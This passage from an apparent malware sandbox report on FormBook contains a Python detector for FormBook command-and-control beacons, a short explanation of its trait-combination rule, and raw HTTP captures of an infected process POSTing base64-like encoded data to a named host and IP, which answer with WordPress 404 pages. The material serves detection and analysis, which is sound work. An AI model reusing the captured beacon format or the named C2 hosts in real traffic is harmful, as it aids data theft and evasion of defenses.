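    "Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36"
)
FOUR_LETTER_DIR = re.compile(r"^/[a-z]{4}/$")        # /rgqx/ and /qpwk/ above
BASE64_LIKE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # checked on the raw, undecoded value
MIN_BLOB_LEN = 32                                     # assumed; the blobs above are far longer


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.1 request, as printed in the report, into its parts."""
    head, _, body = raw.strip().partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def split_form(encoded: str) -> Dict[str, str]:
    """Split key=value&key=value WITHOUT decoding: '+' and '/' must survive the base64 check."""
    params: Dict[str, str] = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def formbook_traits(raw: str) -> List[str]:
    """Return the beacon traits a request exhibits; an empty list means nothing matched."""
    req = parse_request(raw)
    headers = req["headers"]
    parts = urlsplit(req["target"])
    traits: List[str] = []
    if FOUR_LETTER_DIR.match(parts.path):
        traits.append("four-letter directory path")
    if headers.get("user-agent") == FORMBOOK_UA:
        traits.append("hard-coded Android tablet User-Agent")
    params = split_form(parts.query if req["method"] == "GET" else req["body"])
    blobs = [k for k, v in params.items() if len(v) >= MIN_BLOB_LEN and BASE64_LIKE.match(v)]
    if blobs:
        traits.append("opaque base64-like parameter: " + ", ".join(blobs))
    host = headers.get("host", "")
    if (req["method"] == "POST"
            and headers.get("origin") == "http://" + host
            and headers.get("referer") == "http://" + host + parts.path):
        traits.append("Origin/Referer forged to the beacon URL itself")
    if headers.get("connection", "").lower() == "close":
        traits.append("Connection: close")
    return traits


def is_formbook_beacon(raw: str, min_traits: int = 3) -> bool:
    """Assumed decision rule: three or more traits together flag the request."""
    return len(formbook_traits(raw)) >= min_traits


# Sample inputs: GET_BEACON and POST_BEACON are copied from sessions 32 and 33
# above (headers abbreviated); BENIGN is a constructed control for a made-up host.
GET_BEACON = "\n".join([
    "GET /rgqx/?Xn70_=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&mV=ZpN4DLSXOzy8qX HTTP/1.1",
    "Host: www.ayypromo.shop",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Connection: close",
    "User-Agent: " + FORMBOOK_UA,
])
POST_BEACON = "\n".join([
    "POST /qpwk/ HTTP/1.1",
    "Host: www.anaidittrich.com",
    "Origin: http://www.anaidittrich.com",
    "Referer: http://www.anaidittrich.com/qpwk/",
    "Connection: close",
    "Content-Length: 210",
    "Content-Type: application/x-www-form-urlencoded",
    "User-Agent: " + FORMBOOK_UA,
    "",
    "Xn70_=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8Zdrr17HVNGb3+4WeZH2vjciC1OtPuX/a4Ha7LqlQivwfDZo",
])
BENIGN = "\n".join([
    "GET /index.html HTTP/1.1",
    "Host: www.example.test",
    "Connection: close",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
])

if __name__ == "__main__":
    for label, sample in (("GET", GET_BEACON), ("POST", POST_BEACON), ("benign", BENIGN)):
        print(label, is_formbook_beacon(sample), formbook_traits(sample))
```

The form splitter deliberately avoids urllib's parse_qsl: it would turn the '+' inside the blob into a space and the base64 check would then fail on exactly the requests that matter. A single trait (Connection: close, as the benign control shows) is common in legitimate traffic; the value is in the combination, which is why the decision rule requires several together.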


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      34          192.168.2.6  49756        162.55.254.209  80                6008  C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp                             Bytes  Direction  Data
                      Aug 23, 2024 08:28:09.294709921 CEST  790    OUT        POST /qpwk/ HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.anaidittrich.com
                      Referer: http://www.anaidittrich.com/qpwk/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 75 76 50 73 50 4e 61 59 48 77 35 4c 53 6c 43 31 6a 58 51 33 38 4c 41 4e 75 5a 43 71 67 51 2b 44 70 4c 68 49 47 6b 57 62 75 77 4b 77 3d 3d
                      Data Ascii: Xn70_=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQluvPsPNaYHw5LSlC1jXQ38LANuZCqgQ+DpLhIGkWbuwKw==
                      Aug 23, 2024 08:28:10.023159981 CEST  1236   IN         HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:09 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                      Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                      Aug 23, 2024 08:28:10.023180008 CEST  1236   IN         Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                      Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                      Aug 23, 2024 08:28:10.023192883 CEST  448    IN         Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                      Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                      Aug 23, 2024 08:28:10.023206949 CEST  1236   IN         Data Raw: 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63
                      Data Ascii: f3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(
                      Aug 23, 2024 08:28:10.023226023 CEST  1236   IN         Data Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22
                      Data Ascii: "undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObje
                      Aug 23, 2024 08:28:10.023236990 CEST  1236   IN         Data Raw: 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63
                      Data Ascii: :100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}</style><s
                      Aug 23, 2024 08:28:10.023252010 CEST  1236   IN         Data Raw: 3d 36 2e 36 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 68 65 61 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 68 31 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c
                      Data Ascii: =6.6.1' media='all' /><style id='wp-block-heading-inline-css'>h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:wher
                      Aug 23, 2024 08:28:10.023264885 CEST  1236   IN         Data Raw: 29 3b 0a 09 09 09 09 09 63 6c 69 70 2d 70 61 74 68 3a 20 70 61 74 68 28 27 4d 31 31 2e 39 33 2e 36 38 34 76 38 2e 30 33 39 6c 35 2e 36 33 33 2d 35 2e 36 33 33 20 31 2e 32 31 36 20 31 2e 32 33 2d 35 2e 36 36 20 35 2e 36 36 68 38 2e 30 34 76 31 2e
                      Data Ascii: );clip-path: path('M11.93.684v8.039l5.633-5.633 1.216 1.23-5.66 5.66h8.04v1.737H13.2l5.701 5.701-1.23 1.23-5.742-5.742V21h-1.737v-8.094l-5.77 5.77-1.23-1.217 5.743-5.742H.842V9.98h8.162l-5.701-5.7 1.23-1.231 5.66 5.66V.684h1.737Z');
                      Aug 23, 2024 08:28:10.023279905 CEST  1236   IN         Data Raw: 61 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e
                      Data Ascii: ap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writi
                      Aug 23, 2024 08:28:10.023293972 CEST  1236   IN         Data Raw: 61 70 70 65 72 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 77 69 64 74 68 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65
                      Data Ascii: apper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidd
                      Aug 23, 2024 08:28:10.028191090 CEST  1236   IN         Data Raw: 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 29 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f
                      Data Ascii: e(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-bloc


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      35          192.168.2.6  49757        162.55.254.209  80                6008  C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp                             Bytes  Direction  Data
                      Aug 23, 2024 08:28:11.855149984 CEST  1803   OUT        POST /qpwk/ HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.anaidittrich.com
                      Referer: http://www.anaidittrich.com/qpwk/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 55 63 2b 48 46 32 72 61 62 69 71 42 4f 4c 47 30 37 69 62 4f 57 2f 41 52 45 41 6b 47 4e 75 62 44 4c 6c 78 7a 51 68 65 69 2b 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2f 33 4b 6e 63 6f 4a 32 79 4b 78 62 70 74 4d 45 6f 51 61 33 56 72 7a 78 56 7a 48 63 38 71 50 52 61 6b 54 34 67 39 6b 36 4f 36 4c 4f 43 58 57 42 57 4d 43 50 56 74 2b 69 62 45 49 78 55 6d 36 4e 63 4a 30 31 7a 49 48 68 6e 69 56 34 43 2b 6f 64 5a [TRUNCATED]
                      Data Ascii: Xn70_=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 [TRUNCATED]
                      Aug 23, 2024 08:28:12.637598991 CEST  1236   IN         HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:12 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                      Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                      Aug 23, 2024 08:28:12.637609959 CEST  1236   IN         Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                      Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                      Aug 23, 2024 08:28:12.637622118 CEST  1236   IN         Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                      Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                      Aug 23, 2024 08:28:12.637649059 CEST  1236   IN         Data Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                      Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                      Aug 23, 2024 08:28:12.637661934 CEST  1236   IN         Data Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
                      Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
                      Aug 23, 2024 08:28:12.637665033 CEST  1236   IN         Data Raw: 72 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 7d 2e 6c 69 6e 6b 2d 75 69 2d 62 6c 6f 63 6b 2d 69 6e 73 65 72 74 65 72 5f 5f 62 61 63 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
                      Data Ascii: rter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}.is-style-arrow-link .wp-block-navigation-item__label:after {content: "\2197";padding-inline-start: 0.25rem;vertical-align: mid
                      Aug 23, 2024 08:28:12.637669086 CEST1236INData Raw: 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74
                      Data Ascii: lign-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-
                      Aug 23, 2024 08:28:12.637753010 CEST1236INData Raw: 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 72 61 67 72 61 70 68 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 69 73 2d 73 6d 61 6c 6c 2d
                      Data Ascii: -right: auto;}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:l
                      Aug 23, 2024 08:28:12.637758017 CEST1236INData Raw: 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 34 39 34 39 34 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b
                      Data Ascii: appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max
                      Aug 23, 2024 08:28:12.637769938 CEST1236INData Raw: 63 69 6e 67 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 69 6e 68 65 72 69 74 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62
                      Data Ascii: cing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search
                      Aug 23, 2024 08:28:12.642724991 CEST1236INData Raw: 74 28 2e 69 73 2d 6e 6f 74 2d 73 74 61 63 6b 65 64 2d 6f 6e 2d 6d 6f 62 69 6c 65 29 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 7b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d
                      Data Ascii: t(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-b


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      36 | 192.168.2.6 | 49758 | 162.55.254.209 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
